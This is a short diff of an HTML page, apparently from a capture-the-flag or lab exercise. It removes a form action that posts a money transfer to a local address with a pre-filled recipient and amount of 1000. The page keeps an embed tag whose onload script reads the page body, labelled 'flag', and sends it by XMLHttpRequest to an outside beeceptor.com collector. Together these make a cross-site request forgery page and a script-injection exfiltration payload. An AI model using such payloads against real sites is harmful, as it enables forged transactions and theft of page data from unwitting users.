--- a/index.html
+++ b/index.html
@@ -1,6 +1,6 @@
 <html>
   <body>
-  <form id="form1" action="http://192.168.2.98:55824/transfer" method="POST">
+  <form>
   <input type="text" class="form-control" id="inputTo" name="user_to" value="alexqiu@gmail.com">
    `<embed onload = "let flag = this.document.body;\nvar xhr = new window.XMLHttpRequest();\nxhr.open('POST', 'https://alexyqiu.free.beeceptor.com', true);\nxhr.setRequestHeader('Content-Type', 'application/json; charset=UTF-8');\nxhr.send(JSON.stringify(flag));">`
   <input type="number" class="form-control" id="inputAmount" name="amount"  value="1000">
